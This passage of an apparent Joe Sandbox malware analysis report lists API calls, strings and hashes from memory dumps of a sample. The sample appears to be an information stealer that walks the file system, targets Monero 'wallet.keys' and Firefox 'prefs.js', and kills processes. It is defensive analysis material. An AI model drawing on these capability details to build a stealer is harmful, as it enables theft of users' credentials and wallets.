                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                            • String ID: %s\%s$%s\*
                            • API String ID: 671575355-2848263008
                            • Opcode ID: 482bdd47a4291f5ee37cdafbf29c35e4f01bd87c86fcd9560aa0883082a84217
                            • Instruction ID: e4cfbddd912c0d9a872933606371100b7c5c1e291b1f5f7f659eea2fe934db40
                            • Opcode Fuzzy Hash: 482bdd47a4291f5ee37cdafbf29c35e4f01bd87c86fcd9560aa0883082a84217
                            • Instruction Fuzzy Hash: 255168B2904218AFCB65EB70DC99FED737CAB59300F404598B609A6191EF74DB84CFA1
                            APIs
                            • wsprintfA.USER32 ref: 000E4113
                            • FindFirstFileA.KERNEL32(?,?), ref: 000E412A
                            • StrCmpCA.SHLWAPI(?,000F0F94), ref: 000E4158
                            • StrCmpCA.SHLWAPI(?,000F0F98), ref: 000E416E
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000E42BC
                            • FindClose.KERNEL32(000000FF), ref: 000E42D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\%s
                            • API String ID: 180737720-4073750446
                            • Opcode ID: a950d77a6d62c1e4c12d07444479cb14cbe89bc6045818337239009cc0ab74c9
                            • Instruction ID: 2324ac039f087bd9fc687d8f91143aea6a5d1c4512a5655ba823c9340ce0453c
                            • Opcode Fuzzy Hash: a950d77a6d62c1e4c12d07444479cb14cbe89bc6045818337239009cc0ab74c9
                            • Instruction Fuzzy Hash: 815168B1904218AFCB25EBB0DC85FEE737CBB59300F4046D9B619A6051DB75AB89CF50
                            APIs
                            • wsprintfA.USER32 ref: 000DEE3E
                            • FindFirstFileA.KERNEL32(?,?), ref: 000DEE55
                            • StrCmpCA.SHLWAPI(?,000F1630), ref: 000DEEAB
                            • StrCmpCA.SHLWAPI(?,000F1634), ref: 000DEEC1
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000DF3AE
                            • FindClose.KERNEL32(000000FF), ref: 000DF3C3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 180737720-1013718255
                            • Opcode ID: 7c4fc1254c0c50c980c0bb9817e630d43469f50b205a956cc5c1db63580b99a4
                            • Instruction ID: 53fa64adad33f69694afc46e03b6397f32a1d767a7902db033daa582419e549c
                            • Opcode Fuzzy Hash: 7c4fc1254c0c50c980c0bb9817e630d43469f50b205a956cc5c1db63580b99a4
                            • Instruction Fuzzy Hash: 91E10F72A112589EDB64EB61CC62EEE7339AF59300F4145D9B50A72093EF307B89CF61
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                            • API String ID: 0-1562099544
                            • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                            • Instruction ID: d3ca227715c0ca34d3c45d74e2ee829a457ab8677a89dd37b783d1c8dee16f0b
                            • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                            • Instruction Fuzzy Hash: BDE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000F16B0,000F0D97), ref: 000DF81E
                            • StrCmpCA.SHLWAPI(?,000F16B4), ref: 000DF86F
                            • StrCmpCA.SHLWAPI(?,000F16B8), ref: 000DF885
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000DFBB1
                            • FindClose.KERNEL32(000000FF), ref: 000DFBC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID: prefs.js
                            • API String ID: 3334442632-3783873740
                            • Opcode ID: 5facc3b75edafe9cd1bd9540f5e806c969f3377160324e5e88e7f5a73f22f563
                            • Instruction ID: af23126772c1733e7cabc86c449e87ab563b3f98ad31d3b7a7bd9079ffb74a13
                            • Opcode Fuzzy Hash: 5facc3b75edafe9cd1bd9540f5e806c969f3377160324e5e88e7f5a73f22f563
                            • Instruction Fuzzy Hash: 66B13671A002589FCB24FF65DDA5EED7379AF59300F0085A9A50A66153EF306B48CFA2
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000F523C,?,?,?,000F52E4,?,?,00000000,?,00000000), ref: 000D1963
                            • StrCmpCA.SHLWAPI(?,000F538C), ref: 000D19B3
                            • StrCmpCA.SHLWAPI(?,000F5434), ref: 000D19C9
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 000D1D80
                            • DeleteFileA.KERNEL32(00000000), ref: 000D1E0A
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000D1E60
                            • FindClose.KERNEL32(000000FF), ref: 000D1E72
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: 2277a8a1b4b352ebdb119591c8feb066a88a8e59e3ca9142d85e9f6786422ea5
                            • Instruction ID: 2b44a6d5751d217fb5a22e136a3affbecaed83375541bcdb60afbf587beed2fa
                            • Opcode Fuzzy Hash: 2277a8a1b4b352ebdb119591c8feb066a88a8e59e3ca9142d85e9f6786422ea5
                            • Instruction Fuzzy Hash: 99121E71E11158AFCB15EB61CCA6AEE7379AF69300F4145D9A10A76093EF307B88CF61
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,000F0C32), ref: 000DDF5E
                            • StrCmpCA.SHLWAPI(?,000F15C0), ref: 000DDFAE
                            • StrCmpCA.SHLWAPI(?,000F15C4), ref: 000DDFC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000DE4E0
                            • FindClose.KERNEL32(000000FF), ref: 000DE4F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 975a15370520c439f3d8ead5239478119a241b41d494a755ed5b8214de0b4895
                            • Instruction ID: 12e182d5327f562d32fd1c2c81e40e50e64e057dfff572f5855876feb098b72c
                            • Opcode Fuzzy Hash: 975a15370520c439f3d8ead5239478119a241b41d494a755ed5b8214de0b4895
                            • Instruction Fuzzy Hash: BFF1CE71A141589ECB25FB61CDA5EEE7379AF29300F4145DAA10A76093EF307B88CF61
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 6CI $7d_$:2/z$I8$L1}y$V^{$WC__$Y_${{Mk$T)
                            • API String ID: 0-874087593
                            • Opcode ID: a68e1b08d60e6e5caa4d3bd921c27ef75bec43cc971370bb0f4a9a5e86a63f92
                            • Instruction ID: b11e0f4ec28ed9ecd136eb2844e4af7494a9e648b22464e395f6e3010fbd1fdc
                            • Opcode Fuzzy Hash: a68e1b08d60e6e5caa4d3bd921c27ef75bec43cc971370bb0f4a9a5e86a63f92
                            • Instruction Fuzzy Hash: A1B2F8F3A0C2049FE304AE2DEC8567AF7E9EF94720F16493DEAC4C3744E67598058696
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000F15A8,000F0BAF), ref: 000DDBEB
                            • StrCmpCA.SHLWAPI(?,000F15AC), ref: 000DDC33
                            • StrCmpCA.SHLWAPI(?,000F15B0), ref: 000DDC49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 000DDECC
                            • FindClose.KERNEL32(000000FF), ref: 000DDEDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 34aadd492f1ac995d2cacb92f0bebeeef8213a156439fd4ec95d2e52adc14703
                            • Instruction ID: 5bf2caa3042e6f3b0c364554e6372dee4f22f55256c3ae724172ebe87e680c90
                            • Opcode Fuzzy Hash: 34aadd492f1ac995d2cacb92f0bebeeef8213a156439fd4ec95d2e52adc14703
                            • Instruction Fuzzy Hash: FC913772B002449FCB14FB75ED969ED737DAF99300F014669F90666142EF34AB48CBA2
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000E9905
                            • Process32First.KERNEL32(000D9FDE,00000128), ref: 000E9919
                            • Process32Next.KERNEL32(000D9FDE,00000128), ref: 000E992E
                            • StrCmpCA.SHLWAPI(?,000D9FDE), ref: 000E9943
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000E995C
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 000E997A
                            • CloseHandle.KERNEL32(00000000), ref: 000E9987
                            • CloseHandle.KERNEL32(000D9FDE), ref: 000E9993
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 2696918072-0
                            • Opcode ID: feebacbaf1f5c1cd099b17cd5431fcde26af675225f0c909b6fd26981673c4ed
                            • Instruction ID: e55c9d4e6a595bcb469411acd5db2729c6654d2c0e603104a1f37fc30b9bef15
                            • Opcode Fuzzy Hash: feebacbaf1f5c1cd099b17cd5431fcde26af675225f0c909b6fd26981673c4ed
                            • Instruction Fuzzy Hash: EC111C75A04208AFCB65DFA5DC88BDDB7BCAB4A700F00458CF509A6240DB749A84CF90
                            APIs
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            • GetKeyboardLayoutList.USER32(00000000,00000000,000F05B7), ref: 000E7D71
                            • LocalAlloc.KERNEL32(00000040,?), ref: 000E7D89
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 000E7D9D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 000E7DF2
                            • LocalFree.KERNEL32(00000000), ref: 000E7EB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmp
